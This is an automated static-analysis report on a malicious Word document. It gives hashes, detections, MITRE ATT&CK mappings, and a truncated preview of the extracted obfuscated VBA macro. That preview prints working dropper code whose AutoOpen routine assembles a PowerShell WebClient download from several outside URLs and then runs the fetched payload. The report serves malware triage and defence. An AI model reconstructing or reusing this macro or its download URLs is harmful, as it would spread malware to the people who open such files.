Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c6c682659bbdff6…

MALICIOUS

Office (OLE)

Size: 84.5 KB
Created: 2017-11-10 22:50:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 6a98f249cfa78467c0010e435434ffff
SHA-1: 13b5720b808bbffd45e8d00c1d6199f12b05db92
SHA-256: 5c6c682659bbdff670b715d7e4887c0b652456c0fb31ed680f2ea23017a25413
Risk Score: 244

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample contains legacy WordBasic and VBA macros, with a critical heuristic firing for a Shell() call within the AutoOpen macro. This indicates the document is designed to execute arbitrary commands as soon as it is opened. The reconstructed URL 'http://remoLSW+LSWnt-XVc+XVcbriXVc+XVctv.XVc+XVcLSW+LSWruXVc+XVc/XVc+XVcUamuKMpW0IG' is likely used to download and execute a second-stage payload, which is consistent with dropper malware.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6377412-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6377412-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://remoLSW+LSWnt-XVc+XVcbriXVc+XVctv.XVc+XVcLSW+LSWruXVc+XVc (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 43906 bytes
SHA-256: 3c17e3c089b59699aa9007d00cb81c3862659b0716ade5f21b6fce148837b5f1
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 24 long base64-like blobs)
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lijuZflAb"
Function YmfoDmwEu()
bjifztRRf = Mid("7JHslJzwV6767OwD+XVc);eUZkarXVc+XVcapXVc+XVcas =XVc+XVc eULSW+LSWXVc+XVcZnsadasdLSW+LSW.nXVc+XVcextXVc+XVpD06", 17, 89) + DrPjVQB + jbqPSKW
bqVwHir = Mid("JcouGX6cilTqcUmlnl09ZXVc+XVcLSW+LSW://pXVc+XVcrzedsXVc+XVczkXVc+XVcoXVc+XVcle25.LSW+LSWedX'+'VcCa7vo0KD9wwkVGMzP", 22, 74) + ulKTUal + rdNUbof
jEjzWwwY = Mid("qans16hY4zRDuf'+'XVc+XVopRpBSA9", 15, 9) + UkcXJjF + Fzpwbuq
zBWnnzls = Mid("OnUDsOMBXVc+XVcovM/,httXVc+XVcp:/XVc+XVc/XVc+XVcbeniXVc+XVct.XVc+XVcbiz/esuBzXVc+'+'XVczmU/,http://remoLSW+LSWnt-XVc+XVcbriXVc+XVctv.XVc+XVcLSW+LSWruXVc+XVc'+'/XVc+XVcUamuKMpW0IG", 8, 167) + LTGcXJd + sDfwhRs
bRFtkbTwzT = Mid("6Y1oPjKGb3ThXl1MSZRXXVcXVc) ((LSW+LSWXVce'+'UXVcLSW+LSW+XVcZfranc = new-'+'XVc+XLSW+LSWVcobXVLSW+LS'+'WcLSW+LSW+XVcjXVc+XVLS'+'W+LSWcect SysXLSW+LSWVc+XVctemXVc+XVc'+'.XVc+XVcNet.XVc+XVcWiijw7W0mBSYQH7T", 21, 167) + cYTOJnW + qzWhvDi
UKHkh = Mid("W0u/XVc+XVcx'+'LXVc+XVcMXVc+XVc.SpXVc+XVc'+'lit(xLXVc+XVcM,XV'+'c+XVcxLMXVctUUJESlC2u5oDY6MXkuHouwVVjX", 3, 73) + OcIrraH + fTIEZZI
wwIwwnDki = Mid("mMhL0XLSW+LSWVc2XVc+XVc45)XVc+XVc;eUXVc'+'+XVcZhuas =XVc+XVc eUZenXVcLSW+LSW+XVcv:XVc+XVcpublXVc+XVcic XVc+XVc+ xLXVc+XVc'+'MXVc+XVc7FTxLLSW+LSWXVc+XVcM XVc+smAisso6HZGnc85hjq", 6, 152) + riwzwlu + YELHRZt
YqPORzCD = Mid("9wIqWO6AzhNRrzjc(1, 343XVc+hO8A4kR", 16, 12) + ICkdjcd + GaaXakU
zzrSrCLWm = Mid("hp5KKJKXVhd6R8uSXOWw1Lace('Ba3',[stRiNG][CHAR]124).rEpLace('LSW',[stRiNG][CHAR]39) ) r9V", 22, 64) + zRWGovJ + WopRUPB
fmmOncoTXH = Mid("I7oXVcZXVc+XVchuasXVc+XVc);brXVc+'+'LSW'+'+LSWXVceXVc+XVcak;}cXVc+XVcatcXVc+XVch{wXVc+XVcritXVc+XVce-XVc+XVchoXVc+XVcst '+'eUZ_.ExcXVc+XVception.JhizqWSGlsNdhG", 4, 142) + XBiOKbJ + ATvZuJQ
TtbFJzUd = Mid("a9cjFHS,hXVc+XVcttXVc+XVcpXVc+XVc:XVc+XVc/XLUoJcsczf8rY9", 8, 37) + KHtLwRn + iGFaBHi
bKMWVAlzU = Mid("YdqwiXVc,XVc+XVc eUXVc+XVc'+'ZLSW+'+'LSWhjow2AFnz", 6, 36) + KjWolJn + fiNwHFP
IUIvicrhd = Mid("F26Wz5K0n6MZXVc+ eUXVc+XVcZkarXVc+XVcapas + xXVc+XVcLXVc+XVcM.XVc+XVc'+'exexLM;foXVc+XLSW'+'+LSWVcreach'+'(eUZXVc+XVcaXVc+XVcbc XVc+XVcin eUZbcd)'+'{XVc+XVctrXVc+XVcy{XVc+XVceXVc+XVcUZUR7vnjHp5pnRj", 13, 172) + FYBpRvW + ENWUuXi
BjWsz = Mid("rThLqb49cebXVc+XVcCliXVc+XVcent'+'LSW+LSWXVc+XVc;XVc+XVceUZnsaXVc+XVcdaXVc+XVcsd = neXVc+XVcw-obje'+'cXVc+XVct randomXVc+XVc;eUZbcd fFGliUa", 9, 124) + VpZbjdo + zRoTKZd
dBLnInzb = Mid("QKZw1RcDzuaXVc+XVcs);XVc+XVcIXVc+XVcnvoke-IteXVc+XVcm'+'XVc+XVc(eUXVc+zo2WiSCfT", 10, 61) + NMWBIsj + vToFKid
MGAkz = Mid("zzCKbiqrLSWnX'+'Vc+XVceXLSW+LSWVc+LSW'+'+LSWXVctXVc+XVc/9sboib", 9, 48) + dHmuhEc + zJRlrNH
zzUZIbhQHb = Mid("lAcjrv6dEQjuQkTzcUEnYNHAR]77),[sTrInG][CH'+'AR]39).REplACE(XVc7FTXVc,[sTLSW+LSWrInG][CHAR]92))LSW)-CREPlAce  LSWXVcLSW,[CHAR]39 -CREPlAceLSW3qSLSW,[CHAR]36) Ba3. ((gV LSW*MdR*LSW).NaMe'+'[3,11,2]-JoiNLS'+'WLSW)').rEp8OIIKtO70LNh0", 23, 194) + wFvYvph + SPAYwtt
tuMTwZz = Mid("h50jjUn5dl9V513J6rWc'+'+XVcc.DoXVc'+'+XVcwnloXVc+XVcaXVc+XVcdLSW+LSWXVc+XVcLSW+LSWFXVc+XVcile(XVc+XVceUZabcXVc+XVc.XVc+XVcToXVc+XVcSXVc+XVctXVc+XVcring()XVc+ohlaa95", 19, 139) + GwtjwNL + pTRRTiq
YYcYHqkzw = Mid("mknSSkumh2zofXVc+XVcranXVLSW+LSPCjo9ZiGFC908NN", 13, 19) + aiGImIE + fPzjRJu
NEzbXvQXu = Mid("FmO9jX2ZzKvpEnomdE9OtYXVZCwzimozan.XVc+XVccom/XVc+XVce/iJHOD4wp", 29, 27) + zTRwusm + LKshFrz
wJrwtK = Mid("RulWYwiruKdv8RUdYfz3SW+LSWVc+XVc/wFE0EhQ35mLPI4XKnNK", 21, 14) + qNcdBQd + PUOCMRl
jXRVtW = Mid("s3Wq3O6WGimqGiiwXVc+XVcwXVc+XVc.cryptXVc+XVcocurre'+'XVc+XVcncycours'+'eXVc+XVc.LSW+W69hFT3", 16, 69) + OiCjoUi + FcqhNFU
AbdEEzo = Mid("Z+XVcu.koninXVc+XVc.pl/dWjXVc+XVcuO/,http:LSW+LSW//mk0zjhvuKrCo8v0", 2, 51) + YKBtlFj + zdcQWWw
vsDVNkHETMX = Mid("fH7TAWfv= XVc+XV'+'cxXVc+XVcLMht'+'tpq703jnYW9iMjQksmZ3VH3s", 9, 29) + PjGrcDf + jUUPzij
uJzFZVr = Mid("hzkv53mQB7kswlsT1FUInVoKe-expRESsioN ( ('((LSW. (
... (truncated)